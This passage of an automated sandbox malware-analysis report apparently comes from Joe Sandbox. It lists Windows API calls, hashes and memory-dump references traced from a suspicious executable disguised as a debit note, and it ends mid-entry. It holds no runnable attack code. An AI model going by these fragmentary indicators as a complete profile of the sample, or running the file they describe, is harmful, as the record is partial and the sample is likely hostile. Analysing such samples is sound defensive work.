                                • Opcode ID: c62722b4de750a969799caa90d9ea8d5cd16caa5ee659d71882de8b6985993d0
                                • Instruction ID: 2c80559432ee8e8f64af81f0c0a70d483a1ba28b218ef0fe4a74e939514edfa0
                                • Opcode Fuzzy Hash: c62722b4de750a969799caa90d9ea8d5cd16caa5ee659d71882de8b6985993d0
                                • Instruction Fuzzy Hash: CEE08CB2B04104DBCB50AFF4AA889DD7378AB90369B20087BF402F10D1C2B86C009A3E
                                APIs
                                • GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe,80000000,00000003), ref: 00405BB8
                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: File$AttributesCreate
                                • String ID:
                                • API String ID: 415043291-0
                                • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                APIs
                                • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402713
                                  • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: FilePointerwsprintf
                                • String ID:
                                • API String ID: 327478801-0
                                • Opcode ID: cb0a79905901771ea4c1f75ea25e576bfed89f1d44749c98cb94dfee4278d200
                                • Instruction ID: 39f0610c8197233a3f531ee04e93b66353018be783afcd240567e016e4194b11
                                • Opcode Fuzzy Hash: cb0a79905901771ea4c1f75ea25e576bfed89f1d44749c98cb94dfee4278d200
                                • Instruction Fuzzy Hash: 29E01AB2B14114AADB01ABE5DD49CFEB66CEB40319F20043BF101F00D1C67959019A7E
                                APIs
                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: PrivateProfileStringWrite
                                • String ID:
                                • API String ID: 390214022-0
                                • Opcode ID: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                • Instruction ID: 4332bbb19f5efe4f35bb732f6f353b7f8865d75a24debaa01da2fd7198b4a795
                                • Opcode Fuzzy Hash: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                • Instruction Fuzzy Hash: 18E04F329041246ADB113EF20E8DE7F31689B44718B24427FF551BA1C2D5BC1D434669
                                APIs
                                • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: FileRead
                                • String ID:
                                • API String ID: 2738559852-0
                                • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                • Instruction ID: 63114739b8f5e766059d8f14c8810c8407dd6dd2a261f9f87ac8566b0288577e
                                • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                • Instruction Fuzzy Hash: F6E08632104259ABDF10AEA08C04EEB375CEB04350F044436F915E3140D230E9209BA4
                                APIs
                                • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                Memory Dump Source
                                • Source File: 00000000.00000002.11419527256.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.11419505388.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000000.00000002.11419552183.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000000.00000002.11419574238.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                APIs
                                • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: PrivateProfileString
                                • String ID:
                                • API String ID: 1096422788-0
                                • Opcode ID: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                • Instruction ID: 80fa8228d7b44b53eec3e7c38ed93a9451a1703e345daa2b135a9f68ba926bbf
                                • Opcode Fuzzy Hash: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                • Instruction Fuzzy Hash: 38E04F30800204BADB00AFA0CD49EAE3B78BF11344F20843AF581BB0D1E6B895809759
                                APIs
                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: b1f67d0bd68f695adc8489e74b7692cd90077e549d5f6d1bde923581f8f3e0ae
                                • Instruction ID: 73733a4af0cc64661bb0b95da8c6c6dbb498264e8b287c2b288e90457a890fe4
                                • Opcode Fuzzy Hash: b1f67d0bd68f695adc8489e74b7692cd90077e549d5f6d1bde923581f8f3e0ae
                                • Instruction Fuzzy Hash: B8D012B2B08100D7CB10DFE59A08ADDB765AB50329F304A77D111F21D0D2B885419A3A
                                APIs
                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                • Instruction ID: 838c4c0eb33ef43ad7257432987c28a2a788b3f909dd0a51a4998ccc95d90969
                                • Opcode Fuzzy Hash: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                • Instruction Fuzzy Hash: 57C09B717443017BDB308B509D49F1777556754B00F1488397700F50E0CA74E452D62D
                                APIs
                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: FilePointer
                                • String ID:
                                • API String ID: 973152223-0
                                • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                APIs
                                • SendMessageW.USER32(00000028,?,00000001,00403FFB), ref: 004041DD
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                • Instruction ID: c6b71f3973dfff953bb7db756b4a53cf392e498aed0f9e65811aff82f73edd61
                                • Opcode Fuzzy Hash: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                • Instruction Fuzzy Hash: 81B09235684200BADA214B00ED09F867A62A768701F008864B300240B0C6B244A2DB19
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(?,00403F94), ref: 004041C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                • Opcode ID: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                • Instruction ID: 8b53a25d375a508ca0f68064fdc939b5f25de369c98bd294fc40859475f67141
                                • Opcode Fuzzy Hash: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                • Instruction Fuzzy Hash: 02A01132808000ABCA028BA0EF08C0ABB22BBB8300B008A3AB2008003082320820EB0A
                                APIs
                                • Sleep.KERNELBASE(00000000), ref: 004014E6
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: 8ba86804e83874a1906e97ec6801ccf3b7d57510e6f7f4a869b12a6ffab4bff6
                                • Instruction ID: 43bd389e684fdc992c114de42b340604c9c8a7aa9960d5983178e32e9e1c03f3
                                • Opcode Fuzzy Hash: 8ba86804e83874a1906e97ec6801ccf3b7d57510e6f7f4a869b12a6ffab4bff6
                                • Instruction Fuzzy Hash: 42D0C9B7B141409BDB50EBB8AE8989B73A8E7913297204C73D942F20A1D178D8029A39
                                APIs
                                • GetDlgItem.USER32(?,000003F9), ref: 00404B86
                                • GetDlgItem.USER32(?,00000408), ref: 00404B91
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BDB
                                • LoadBitmapW.USER32(0000006E), ref: 00404BEE
                                • SetWindowLongW.USER32(?,000000FC,00405166), ref: 00404C07
                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C1B
                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C2D
                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404C43
                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C4F
                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C61
                                • DeleteObject.GDI32(00000000), ref: 00404C64
                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C8F
                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C9B
                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D31
                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D5C
                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D70
                                • GetWindowLongW.USER32(?,000000F0), ref: 00404D9F
                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404DAD
                                • ShowWindow.USER32(?,00000005), ref: 00404DBE
                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EBB
                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F20
                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404F35
                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F59
                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F79
                                • ImageList_Destroy.COMCTL32(?), ref: 00404F8E
                                • GlobalFree.KERNEL32(?), ref: 00404F9E
                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405017
                                • SendMessageW.USER32(?,00001102,?,?), ref: 004050C0
                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004050CF
                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004050EF
                                • ShowWindow.USER32(?,00000000), ref: 0040513D
                                • GetDlgItem.USER32(?,000003FE), ref: 00405148
                                • ShowWindow.USER32(00000000), ref: 0040514F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                • String ID: $M$N
                                • API String ID: 1638840714-813528018
                                • Opcode ID: c0ce892580bc14cf4332d57b508c1e8237967f859a0b842146343ba826295983
                                • Instruction ID: c838968d9b53d15d037ad3ebbdc97e0e82191de3b695f5e6670933e8e46a19ea
                                • Opcode Fuzzy Hash: c0ce892580bc14cf4332d57b508c1e8237967f859a0b842146343ba826295983
                                • Instruction Fuzzy Hash: E9026EB0A00209EFDB209F94DC85AAE7BB5FB44314F10857AF610BA2E1C7799D42CF58
                                APIs
                                • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                • lstrcmpiW.KERNEL32(Call,004226E8,00000000,?,?), ref: 0040479C
                                • lstrcatW.KERNEL32(?,Call), ref: 004047A8
                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                  • Part of subcall function 00405708: GetDlgItemTextW.USER32(?,?,00000400,004047F1), ref: 0040571B
                                  • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,77223420,00403542), ref: 0040623F
                                  • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                  • Part of subcall function 004061DC: CharNextW.USER32(?,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,77223420,00403542), ref: 00406253
                                  • Part of subcall function 004061DC: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,77223420,00403542), ref: 00406266
                                • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487B
                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404896
                                • SetDlgItemTextW.USER32(00000000,00000400,004206A8), ref: 0040490F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                • String ID: A$C:\Users\user\brugerlicensaftalerne$Call$&B
                                • API String ID: 2246997448-41963567
                                • Opcode ID: 0ddb93969d7d4b6c2286eeeb01da71e9d9c76c94d99e26f32eb17bb22fa58419
                                • Instruction ID: 6e37369fe6ef7f71d764005b1086c215e28ed7130f32df1ae996be3c53d44702
                                • Opcode Fuzzy Hash: 0ddb93969d7d4b6c2286eeeb01da71e9d9c76c94d99e26f32eb17bb22fa58419
                                • Instruction Fuzzy Hash: A79170F1900219EBDB10AFA1DC85AAF77B8EF85714F10443BF601B62D1D77C9A418B69
                                APIs
                                • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                Strings
                                • C:\Users\user\brugerlicensaftalerne\Isidora, xrefs: 004020FB
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
